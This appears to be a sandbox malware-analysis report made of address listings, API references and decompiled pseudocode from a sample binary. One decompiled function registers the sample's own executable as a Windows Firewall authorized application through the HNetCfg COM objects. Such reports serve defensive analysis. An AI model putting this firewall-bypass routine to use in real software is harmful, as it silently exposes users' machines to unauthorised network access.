                                                                                                                                                                                          0x00c84852
                                                                                                                                                                                          0x00c8485a
                                                                                                                                                                                          0x00c8485e
                                                                                                                                                                                          0x00c84862
                                                                                                                                                                                          0x00c84862
                                                                                                                                                                                          0x00c84865
                                                                                                                                                                                          0x00c84867
                                                                                                                                                                                          0x00c84869
                                                                                                                                                                                          0x00c8486d
                                                                                                                                                                                          0x00c8486d
                                                                                                                                                                                          0x00c84873
                                                                                                                                                                                          0x00c84877
                                                                                                                                                                                          0x00c84879
                                                                                                                                                                                          0x00c8489d
                                                                                                                                                                                          0x00c848a0
                                                                                                                                                                                          0x00c848a3
                                                                                                                                                                                          0x00c848a7
                                                                                                                                                                                          0x00c84907
                                                                                                                                                                                          0x00c84910
                                                                                                                                                                                          0x00c84919
                                                                                                                                                                                          0x00c8491f
                                                                                                                                                                                          0x00c84922
                                                                                                                                                                                          0x00c84927
                                                                                                                                                                                          0x00c8492e
                                                                                                                                                                                          0x00c84932
                                                                                                                                                                                          0x00c8493c
                                                                                                                                                                                          0x00c84934
                                                                                                                                                                                          0x00c84934
                                                                                                                                                                                          0x00c84934
                                                                                                                                                                                          0x00c84949
                                                                                                                                                                                          0x00c8494d
                                                                                                                                                                                          0x00c848a9
                                                                                                                                                                                          0x00c848af
                                                                                                                                                                                          0x00c848b8
                                                                                                                                                                                          0x00c848c1
                                                                                                                                                                                          0x00c848c7
                                                                                                                                                                                          0x00c848ca
                                                                                                                                                                                          0x00c848cf
                                                                                                                                                                                          0x00c848d6
                                                                                                                                                                                          0x00c848da
                                                                                                                                                                                          0x00c848ee
                                                                                                                                                                                          0x00c848f8
                                                                                                                                                                                          0x00c848fc
                                                                                                                                                                                          0x00c848dc
                                                                                                                                                                                          0x00c848dc
                                                                                                                                                                                          0x00c848e5
                                                                                                                                                                                          0x00c848e9
                                                                                                                                                                                          0x00c848e9
                                                                                                                                                                                          0x00c848da
                                                                                                                                                                                          0x00c84953
                                                                                                                                                                                          0x00c8495a
                                                                                                                                                                                          0x00c8495d
                                                                                                                                                                                          0x00c8495f
                                                                                                                                                                                          0x00c84963
                                                                                                                                                                                          0x00c84966
                                                                                                                                                                                          0x00c8496a
                                                                                                                                                                                          0x00c8496d
                                                                                                                                                                                          0x00c84974
                                                                                                                                                                                          0x00c8497a
                                                                                                                                                                                          0x00c84980
                                                                                                                                                                                          0x00c84998
                                                                                                                                                                                          0x00c84998
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c84982
                                                                                                                                                                                          0x00c84982
                                                                                                                                                                                          0x00c84989
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8498b
                                                                                                                                                                                          0x00c84992
                                                                                                                                                                                          0x00c84996
                                                                                                                                                                                          0x00c8499c
                                                                                                                                                                                          0x00c8499c
                                                                                                                                                                                          0x00c849a0
                                                                                                                                                                                          0x00c849ac
                                                                                                                                                                                          0x00c849ac
                                                                                                                                                                                          0x00c849b7
                                                                                                                                                                                          0x00c849bb
                                                                                                                                                                                          0x00c849be
                                                                                                                                                                                          0x00c849cb
                                                                                                                                                                                          0x00c849ce
                                                                                                                                                                                          0x00c849d0
                                                                                                                                                                                          0x00c849d0
                                                                                                                                                                                          0x00c849c0
                                                                                                                                                                                          0x00c849c0
                                                                                                                                                                                          0x00c849c0
                                                                                                                                                                                          0x00c849e4
                                                                                                                                                                                          0x00c849e8
                                                                                                                                                                                          0x00c849ed
                                                                                                                                                                                          0x00c849f1
                                                                                                                                                                                          0x00c849f3
                                                                                                                                                                                          0x00c84a0e
                                                                                                                                                                                          0x00c84a10
                                                                                                                                                                                          0x00c84a36
                                                                                                                                                                                          0x00c84a36
                                                                                                                                                                                          0x00c84a3c
                                                                                                                                                                                          0x00c84a41
                                                                                                                                                                                          0x00c84a45
                                                                                                                                                                                          0x00c84a72
                                                                                                                                                                                          0x00c84a76
                                                                                                                                                                                          0x00c84a80
                                                                                                                                                                                          0x00c84a82
                                                                                                                                                                                          0x00c84a85
                                                                                                                                                                                          0x00c84a89
                                                                                                                                                                                          0x00c84a8b
                                                                                                                                                                                          0x00c84b54
                                                                                                                                                                                          0x00c84b54
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c84b54
                                                                                                                                                                                          0x00c84a91
                                                                                                                                                                                          0x00c84a93
                                                                                                                                                                                          0x00c84a98
                                                                                                                                                                                          0x00c84a9d
                                                                                                                                                                                          0x00c84aa0
                                                                                                                                                                                          0x00c84aa2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c84aa8
                                                                                                                                                                                          0x00c84aab
                                                                                                                                                                                          0x00c84aad
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c84aba
                                                                                                                                                                                          0x00c84abf
                                                                                                                                                                                          0x00c84ac4
                                                                                                                                                                                          0x00c84ac9
                                                                                                                                                                                          0x00c84acc
                                                                                                                                                                                          0x00c84ace
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c84ad4
                                                                                                                                                                                          0x00c84ad7
                                                                                                                                                                                          0x00c84ad9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c84ae2
                                                                                                                                                                                          0x00c84ae4
                                                                                                                                                                                          0x00c84ae9
                                                                                                                                                                                          0x00c84aee
                                                                                                                                                                                          0x00c84af1
                                                                                                                                                                                          0x00c84af3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c84af5
                                                                                                                                                                                          0x00c84af8
                                                                                                                                                                                          0x00c84afa
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c84b05
                                                                                                                                                                                          0x00c84b09
                                                                                                                                                                                          0x00c84b0e
                                                                                                                                                                                          0x00c84b11
                                                                                                                                                                                          0x00c84b13
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c84b15
                                                                                                                                                                                          0x00c84b1c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c84b1e
                                                                                                                                                                                          0x00c84b2d
                                                                                                                                                                                          0x00c84b3a
                                                                                                                                                                                          0x00c84b41
                                                                                                                                                                                          0x00c84b46
                                                                                                                                                                                          0x00c84b49
                                                                                                                                                                                          0x00c84b4b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c84b51
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c84b51
                                                                                                                                                                                          0x00c84a47
                                                                                                                                                                                          0x00c84a49
                                                                                                                                                                                          0x00c84a4b
                                                                                                                                                                                          0x00c84a4d
                                                                                                                                                                                          0x00c84a50
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c84a52
                                                                                                                                                                                          0x00c84a52
                                                                                                                                                                                          0x00c84a52
                                                                                                                                                                                          0x00c84a58
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c84a5a
                                                                                                                                                                                          0x00c84a5e
                                                                                                                                                                                          0x00c84a6b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c84a6b
                                                                                                                                                                                          0x00c84a60
                                                                                                                                                                                          0x00c84a60
                                                                                                                                                                                          0x00c84a61
                                                                                                                                                                                          0x00c84a64
                                                                                                                                                                                          0x00c84a64
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c84a69
                                                                                                                                                                                          0x00c84a16
                                                                                                                                                                                          0x00c84a1e
                                                                                                                                                                                          0x00c84a22
                                                                                                                                                                                          0x00c84a27
                                                                                                                                                                                          0x00c84a2a
                                                                                                                                                                                          0x00c84a2c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c84a32
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c849f5
                                                                                                                                                                                          0x00c849f5
                                                                                                                                                                                          0x00c849fa
                                                                                                                                                                                          0x00c849fb
                                                                                                                                                                                          0x00c849fc
                                                                                                                                                                                          0x00c84a01
                                                                                                                                                                                          0x00c84a06
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c84a06
                                                                                                                                                                                          0x00c849f3
                                                                                                                                                                                          0x00c849a2
                                                                                                                                                                                          0x00c849a6
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c849a6
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c84996
                                                                                                                                                                                          0x00c8487b
                                                                                                                                                                                          0x00c8487b
                                                                                                                                                                                          0x00c84883
                                                                                                                                                                                          0x00c84887
                                                                                                                                                                                          0x00c8488c
                                                                                                                                                                                          0x00c8488f
                                                                                                                                                                                          0x00c84891
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c84897
                                                                                                                                                                                          0x00c8489b
                                                                                                                                                                                          0x00c8489b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8489b
                                                                                                                                                                                          0x00c84879
                                                                                                                                                                                          0x00c8480d
                                                                                                                                                                                          0x00c84811
                                                                                                                                                                                          0x00c84815
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8481b
                                                                                                                                                                                          0x00c84820
                                                                                                                                                                                          0x00c84828
                                                                                                                                                                                          0x00c8482c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8482c
                                                                                                                                                                                          0x00c84799
                                                                                                                                                                                          0x00c8479e
                                                                                                                                                                                          0x00c847a1
                                                                                                                                                                                          0x00c847a3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c847a9
                                                                                                                                                                                          0x00c847af
                                                                                                                                                                                          0x00c847b1
                                                                                                                                                                                          0x00c847b1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c847af
                                                                                                                                                                                          0x00c84701
                                                                                                                                                                                          0x00c84706
                                                                                                                                                                                          0x00c84707
                                                                                                                                                                                          0x00c84708
                                                                                                                                                                                          0x00c8470d
                                                                                                                                                                                          0x00c84712
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c846bd
                                                                                                                                                                                          0x00c846bd
                                                                                                                                                                                          0x00c846c2
                                                                                                                                                                                          0x00c846c3
                                                                                                                                                                                          0x00c846c4
                                                                                                                                                                                          0x00c846c9
                                                                                                                                                                                          0x00c846ce
                                                                                                                                                                                          0x00c84b70
                                                                                                                                                                                          0x00c84b70
                                                                                                                                                                                          0x00c84b74
                                                                                                                                                                                          0x00c84b76
                                                                                                                                                                                          0x00c84b78
                                                                                                                                                                                          0x00c84b79
                                                                                                                                                                                          0x00c84b7e
                                                                                                                                                                                          0x00c84b7e
                                                                                                                                                                                          0x00c84b81
                                                                                                                                                                                          0x00c84b85
                                                                                                                                                                                          0x00c84b87
                                                                                                                                                                                          0x00c84b89
                                                                                                                                                                                          0x00c84b8a
                                                                                                                                                                                          0x00c84b8f
                                                                                                                                                                                          0x00c84b8f
                                                                                                                                                                                          0x00c84b9d
                                                                                                                                                                                          0x00c84b9d

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _memset.LIBCMT ref: 00C846A1
                                                                                                                                                                                          • GetFileSizeEx.KERNEL32(?,?,00000000,?,00000003), ref: 00C846B3
                                                                                                                                                                                          • _malloc.LIBCMT ref: 00C846E3
                                                                                                                                                                                          • SetLastError.KERNEL32(00000008,?,?,?,00004000), ref: 00C846F3
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ErrorFileLastSize_malloc_memset
                                                                                                                                                                                          • String ID: INIT$PE
                                                                                                                                                                                          • API String ID: 942205088-3949469810
                                                                                                                                                                                          • Opcode ID: 86013747d82f68fa087a3618d059c2cedc63baf84cdc783985f3fbfc861765bb
                                                                                                                                                                                          • Instruction ID: a8aedf21be84ceda5f01a954a1fc77f674ba67097399f2005dc10ddb1eb79054
                                                                                                                                                                                          • Opcode Fuzzy Hash: 86013747d82f68fa087a3618d059c2cedc63baf84cdc783985f3fbfc861765bb
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8FE1A2719043429BDB28EF15D841B6B77E4FF94708F04492DF9A89B282F771DA04C7AA
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C99AD6 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 89%
                                                                                                                                                                                          			E00C99AD6(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t119;
				intOrPtr _t120;
				intOrPtr* _t123;
				intOrPtr* _t125;
				intOrPtr* _t128;
				intOrPtr* _t130;
				intOrPtr* _t133;
				intOrPtr* _t135;
				intOrPtr* _t137;
				intOrPtr* _t139;
				intOrPtr* _t142;
				intOrPtr* _t144;
				void* _t145;
				intOrPtr* _t146;
				intOrPtr* _t147;
				intOrPtr* _t148;
				intOrPtr* _t149;
				intOrPtr* _t150;
				intOrPtr* _t157;
				intOrPtr* _t158;
				intOrPtr* _t159;
				intOrPtr* _t160;
				intOrPtr* _t168;
				intOrPtr* _t170;
				intOrPtr* _t172;
				intOrPtr* _t173;
				intOrPtr* _t174;
				intOrPtr* _t175;
				intOrPtr* _t176;
				void* _t229;

				_push(0x2c);
				E00D0158D(0xd2fe47, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t229 - 4)) = 0;
				 *((intOrPtr*)(_t229 - 0x20)) = 0;
				E00C97412(_t229 - 0x20, L"HNetCfg.FwMgr", 0, 0x17); // executed
				_t119 =  *((intOrPtr*)(_t229 - 0x20));
				if(_t119 == 0) {
					L4:
					_t120 = 0;
					L5:
					return E00D01632(_t120);
				}
				 *((intOrPtr*)(_t229 - 0x28)) = 0;
				 *((char*)(_t229 - 4)) = 2;
				 *((intOrPtr*)( *_t119 + 0x1c))(_t119, _t229 - 0x28);
				_t123 =  *((intOrPtr*)(_t229 - 0x28));
				if(_t123 != 0) {
					 *((intOrPtr*)(_t229 - 0x2c)) = 0;
					 *((char*)(_t229 - 4)) = 3;
					 *((intOrPtr*)( *_t123 + 0x1c))(_t123, _t229 - 0x2c);
					_t125 =  *((intOrPtr*)(_t229 - 0x2c));
					if(_t125 != 0) {
						 *((intOrPtr*)(_t229 - 0x24)) = 0;
						 *((char*)(_t229 - 4)) = 4;
						 *((intOrPtr*)( *_t125 + 0x50))(_t125, _t229 - 0x24);
						if( *((intOrPtr*)(_t229 - 0x24)) != 0) {
							 *((intOrPtr*)(_t229 - 0x1c)) = 0;
							 *((char*)(_t229 - 4)) = 5;
							E00C97F97(_t229 - 0x1c,  *((intOrPtr*)(_t229 + 8)));
							 *((intOrPtr*)(_t229 - 0x30)) = 0;
							_t128 =  *((intOrPtr*)(_t229 - 0x24));
							 *((char*)(_t229 - 4)) = 6;
							 *((intOrPtr*)( *_t128 + 0x28))(_t128,  *((intOrPtr*)(_t229 - 0x1c)), _t229 - 0x30);
							_t130 =  *((intOrPtr*)(_t229 - 0x30));
							if(_t130 == 0) {
								L28:
								 *((char*)(_t229 - 4)) = 5;
								if(_t130 != 0) {
									 *((intOrPtr*)( *_t130 + 8))(_t130);
								}
								 *((intOrPtr*)(_t229 - 0x18)) = 0;
								 *((char*)(_t229 - 4)) = 7;
								E00C974EF(_t229 - 0x18, L"HNetCfg.FwAuthorizedApplication", 0, 0x17); // executed
								if( *((intOrPtr*)(_t229 - 0x18)) != 0) {
									E00C97F97(_t229 - 0x1c,  *((intOrPtr*)(_t229 + 0xc)));
									_t133 =  *((intOrPtr*)(_t229 - 0x18));
									 *((intOrPtr*)( *_t133 + 0x20))(_t133,  *((intOrPtr*)(_t229 - 0x1c)));
									_t135 =  *((intOrPtr*)(_t229 - 0x18));
									 *((intOrPtr*)( *_t135 + 0x38))(_t135, 0);
									_t137 =  *((intOrPtr*)(_t229 - 0x18));
									 *((intOrPtr*)( *_t137 + 0x30))(_t137, 2);
									_t139 =  *((intOrPtr*)(_t229 - 0x18));
									 *((intOrPtr*)( *_t139 + 0x48))(_t139, 0xffffffff);
									E00C97F97(_t229 - 0x1c,  *((intOrPtr*)(_t229 + 8)));
									_t142 =  *((intOrPtr*)(_t229 - 0x18));
									 *((intOrPtr*)( *_t142 + 0x28))(_t142,  *((intOrPtr*)(_t229 - 0x1c)));
									_t144 =  *((intOrPtr*)(_t229 - 0x24));
									_t145 =  *((intOrPtr*)( *_t144 + 0x20))(_t144,  *((intOrPtr*)(_t229 - 0x18)));
									_t146 =  *((intOrPtr*)(_t229 - 0x18));
									 *((char*)(_t229 - 4)) = 5;
									if(_t145 >= 0) {
										if(_t146 != 0) {
											 *((intOrPtr*)( *_t146 + 8))(_t146);
										}
										__imp__#6( *((intOrPtr*)(_t229 - 0x1c)));
										_t147 =  *((intOrPtr*)(_t229 - 0x24));
										 *((char*)(_t229 - 4)) = 3;
										if(_t147 != 0) {
											 *((intOrPtr*)( *_t147 + 8))(_t147);
										}
										_t148 =  *((intOrPtr*)(_t229 - 0x2c));
										 *((char*)(_t229 - 4)) = 2;
										if(_t148 != 0) {
											 *((intOrPtr*)( *_t148 + 8))(_t148);
										}
										_t149 =  *((intOrPtr*)(_t229 - 0x28));
										 *((char*)(_t229 - 4)) = 1;
										if(_t149 != 0) {
											 *((intOrPtr*)( *_t149 + 8))(_t149);
										}
										_t150 =  *((intOrPtr*)(_t229 - 0x20));
										 *((char*)(_t229 - 4)) = 0;
										if(_t150 != 0) {
											 *((intOrPtr*)( *_t150 + 8))(_t150);
										}
										_t120 = 1;
										goto L5;
									}
									if(_t146 != 0) {
										 *((intOrPtr*)( *_t146 + 8))(_t146);
									}
									goto L31;
								} else {
									L31:
									__imp__#6( *((intOrPtr*)(_t229 - 0x1c)));
									_t157 =  *((intOrPtr*)(_t229 - 0x24));
									 *((char*)(_t229 - 4)) = 3;
									if(_t157 != 0) {
										 *((intOrPtr*)( *_t157 + 8))(_t157);
									}
									goto L10;
								}
							}
							 *((intOrPtr*)(_t229 - 0x34)) = 1;
							 *((intOrPtr*)(_t229 - 0x38)) = 0;
							 *((intOrPtr*)( *_t130 + 0x44))(_t130, _t229 - 0x14);
							_t168 =  *((intOrPtr*)(_t229 - 0x30));
							 *((intOrPtr*)( *_t168 + 0x34))(_t168, _t229 - 0x34);
							_t170 =  *((intOrPtr*)(_t229 - 0x30));
							 *((intOrPtr*)( *_t170 + 0x2c))(_t170, _t229 - 0x38);
							if( *((short*)(_t229 - 0x14)) != 0xffff ||  *((intOrPtr*)(_t229 - 0x34)) != 0 ||  *((intOrPtr*)(_t229 - 0x38)) != 2) {
								_t130 =  *((intOrPtr*)(_t229 - 0x30));
								goto L28;
							} else {
								_t172 =  *((intOrPtr*)(_t229 - 0x30));
								 *((char*)(_t229 - 4)) = 5;
								if(_t172 != 0) {
									 *((intOrPtr*)( *_t172 + 8))(_t172);
								}
								__imp__#6( *((intOrPtr*)(_t229 - 0x1c)));
								_t173 =  *((intOrPtr*)(_t229 - 0x24));
								 *((char*)(_t229 - 4)) = 3;
								if(_t173 != 0) {
									 *((intOrPtr*)( *_t173 + 8))(_t173);
								}
								_t174 =  *((intOrPtr*)(_t229 - 0x2c));
								 *((char*)(_t229 - 4)) = 2;
								if(_t174 != 0) {
									 *((intOrPtr*)( *_t174 + 8))(_t174);
								}
								_t175 =  *((intOrPtr*)(_t229 - 0x28));
								 *((char*)(_t229 - 4)) = 1;
								if(_t175 != 0) {
									 *((intOrPtr*)( *_t175 + 8))(_t175);
								}
								_t176 =  *((intOrPtr*)(_t229 - 0x20));
								 *((char*)(_t229 - 4)) = 0;
								if(_t176 != 0) {
									 *((intOrPtr*)( *_t176 + 8))(_t176);
								}
								_t120 = 1;
								goto L5;
							}
						}
						L10:
						_t158 =  *((intOrPtr*)(_t229 - 0x2c));
						 *((char*)(_t229 - 4)) = 2;
						if(_t158 != 0) {
							 *((intOrPtr*)( *_t158 + 8))(_t158);
						}
					}
					_t159 =  *((intOrPtr*)(_t229 - 0x28));
					 *((char*)(_t229 - 4)) = 1;
					if(_t159 != 0) {
						 *((intOrPtr*)( *_t159 + 8))(_t159);
					}
				}
				_t160 =  *((intOrPtr*)(_t229 - 0x20));
				 *((char*)(_t229 - 4)) = 0;
				if(_t160 != 0) {
					 *((intOrPtr*)( *_t160 + 8))(_t160);
				}
				goto L4;
			}

































                                                                                                                                                                                          0x00c99ad6
                                                                                                                                                                                          0x00c99add
                                                                                                                                                                                          0x00c99ae4
                                                                                                                                                                                          0x00c99ae7
                                                                                                                                                                                          0x00c99af5
                                                                                                                                                                                          0x00c99afa
                                                                                                                                                                                          0x00c99aff
                                                                                                                                                                                          0x00c99b29
                                                                                                                                                                                          0x00c99b29
                                                                                                                                                                                          0x00c99b2b
                                                                                                                                                                                          0x00c99b30
                                                                                                                                                                                          0x00c99b30
                                                                                                                                                                                          0x00c99b01
                                                                                                                                                                                          0x00c99b0b
                                                                                                                                                                                          0x00c99b0f
                                                                                                                                                                                          0x00c99b12
                                                                                                                                                                                          0x00c99b17
                                                                                                                                                                                          0x00c99b31
                                                                                                                                                                                          0x00c99b3b
                                                                                                                                                                                          0x00c99b3f
                                                                                                                                                                                          0x00c99b42
                                                                                                                                                                                          0x00c99b47
                                                                                                                                                                                          0x00c99b5c
                                                                                                                                                                                          0x00c99b66
                                                                                                                                                                                          0x00c99b6a
                                                                                                                                                                                          0x00c99b70
                                                                                                                                                                                          0x00c99b85
                                                                                                                                                                                          0x00c99b8e
                                                                                                                                                                                          0x00c99b92
                                                                                                                                                                                          0x00c99b97
                                                                                                                                                                                          0x00c99b9a
                                                                                                                                                                                          0x00c99ba6
                                                                                                                                                                                          0x00c99bab
                                                                                                                                                                                          0x00c99bae
                                                                                                                                                                                          0x00c99bb3
                                                                                                                                                                                          0x00c99c5f
                                                                                                                                                                                          0x00c99c5f
                                                                                                                                                                                          0x00c99c65
                                                                                                                                                                                          0x00c99c6a
                                                                                                                                                                                          0x00c99c6a
                                                                                                                                                                                          0x00c99c6d
                                                                                                                                                                                          0x00c99c7b
                                                                                                                                                                                          0x00c99c7f
                                                                                                                                                                                          0x00c99c87
                                                                                                                                                                                          0x00c99cb2
                                                                                                                                                                                          0x00c99cb7
                                                                                                                                                                                          0x00c99cc0
                                                                                                                                                                                          0x00c99cc3
                                                                                                                                                                                          0x00c99cca
                                                                                                                                                                                          0x00c99ccd
                                                                                                                                                                                          0x00c99cd5
                                                                                                                                                                                          0x00c99cd8
                                                                                                                                                                                          0x00c99ce0
                                                                                                                                                                                          0x00c99ce9
                                                                                                                                                                                          0x00c99cee
                                                                                                                                                                                          0x00c99cf7
                                                                                                                                                                                          0x00c99cfa
                                                                                                                                                                                          0x00c99d03
                                                                                                                                                                                          0x00c99d08
                                                                                                                                                                                          0x00c99d0b
                                                                                                                                                                                          0x00c99d0f
                                                                                                                                                                                          0x00c99d26
                                                                                                                                                                                          0x00c99d2b
                                                                                                                                                                                          0x00c99d2b
                                                                                                                                                                                          0x00c99d31
                                                                                                                                                                                          0x00c99d37
                                                                                                                                                                                          0x00c99d3a
                                                                                                                                                                                          0x00c99d40
                                                                                                                                                                                          0x00c99d45
                                                                                                                                                                                          0x00c99d45
                                                                                                                                                                                          0x00c99d48
                                                                                                                                                                                          0x00c99d4b
                                                                                                                                                                                          0x00c99d51
                                                                                                                                                                                          0x00c99d56
                                                                                                                                                                                          0x00c99d56
                                                                                                                                                                                          0x00c99d59
                                                                                                                                                                                          0x00c99d5c
                                                                                                                                                                                          0x00c99d62
                                                                                                                                                                                          0x00c99d67
                                                                                                                                                                                          0x00c99d67
                                                                                                                                                                                          0x00c99d6a
                                                                                                                                                                                          0x00c99d6d
                                                                                                                                                                                          0x00c99d72
                                                                                                                                                                                          0x00c99d77
                                                                                                                                                                                          0x00c99d77
                                                                                                                                                                                          0x00c99d7c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c99d7c
                                                                                                                                                                                          0x00c99d13
                                                                                                                                                                                          0x00c99d1c
                                                                                                                                                                                          0x00c99d1c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c99c89
                                                                                                                                                                                          0x00c99c89
                                                                                                                                                                                          0x00c99c8c
                                                                                                                                                                                          0x00c99c92
                                                                                                                                                                                          0x00c99c95
                                                                                                                                                                                          0x00c99c9b
                                                                                                                                                                                          0x00c99ca4
                                                                                                                                                                                          0x00c99ca4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c99c9b
                                                                                                                                                                                          0x00c99c87
                                                                                                                                                                                          0x00c99bc0
                                                                                                                                                                                          0x00c99bc3
                                                                                                                                                                                          0x00c99bc9
                                                                                                                                                                                          0x00c99bcc
                                                                                                                                                                                          0x00c99bd6
                                                                                                                                                                                          0x00c99bd9
                                                                                                                                                                                          0x00c99be3
                                                                                                                                                                                          0x00c99beb
                                                                                                                                                                                          0x00c99c5c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c99bf8
                                                                                                                                                                                          0x00c99bf8
                                                                                                                                                                                          0x00c99bfb
                                                                                                                                                                                          0x00c99c01
                                                                                                                                                                                          0x00c99c06
                                                                                                                                                                                          0x00c99c06
                                                                                                                                                                                          0x00c99c0c
                                                                                                                                                                                          0x00c99c12
                                                                                                                                                                                          0x00c99c15
                                                                                                                                                                                          0x00c99c1b
                                                                                                                                                                                          0x00c99c20
                                                                                                                                                                                          0x00c99c20
                                                                                                                                                                                          0x00c99c23
                                                                                                                                                                                          0x00c99c26
                                                                                                                                                                                          0x00c99c2c
                                                                                                                                                                                          0x00c99c31
                                                                                                                                                                                          0x00c99c31
                                                                                                                                                                                          0x00c99c34
                                                                                                                                                                                          0x00c99c37
                                                                                                                                                                                          0x00c99c3d
                                                                                                                                                                                          0x00c99c42
                                                                                                                                                                                          0x00c99c42
                                                                                                                                                                                          0x00c99c45
                                                                                                                                                                                          0x00c99c48
                                                                                                                                                                                          0x00c99c4d
                                                                                                                                                                                          0x00c99c52
                                                                                                                                                                                          0x00c99c52
                                                                                                                                                                                          0x00c99c55
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c99c55
                                                                                                                                                                                          0x00c99beb
                                                                                                                                                                                          0x00c99b72
                                                                                                                                                                                          0x00c99b72
                                                                                                                                                                                          0x00c99b75
                                                                                                                                                                                          0x00c99b7b
                                                                                                                                                                                          0x00c99b80
                                                                                                                                                                                          0x00c99b80
                                                                                                                                                                                          0x00c99b7b
                                                                                                                                                                                          0x00c99b49
                                                                                                                                                                                          0x00c99b4c
                                                                                                                                                                                          0x00c99b52
                                                                                                                                                                                          0x00c99b57
                                                                                                                                                                                          0x00c99b57
                                                                                                                                                                                          0x00c99b52
                                                                                                                                                                                          0x00c99b19
                                                                                                                                                                                          0x00c99b1c
                                                                                                                                                                                          0x00c99b21
                                                                                                                                                                                          0x00c99b26
                                                                                                                                                                                          0x00c99b26
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __EH_prolog3_catch.LIBCMT ref: 00C99ADD
                                                                                                                                                                                            • Part of subcall function 00C97412: CLSIDFromProgID.OLE32(?,?), ref: 00C97431
                                                                                                                                                                                            • Part of subcall function 00C97412: CoCreateInstance.OLE32(?,?,?,00D3A8B0), ref: 00C97449
                                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00C99C0C
                                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00C99C8C
                                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00C99D31
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
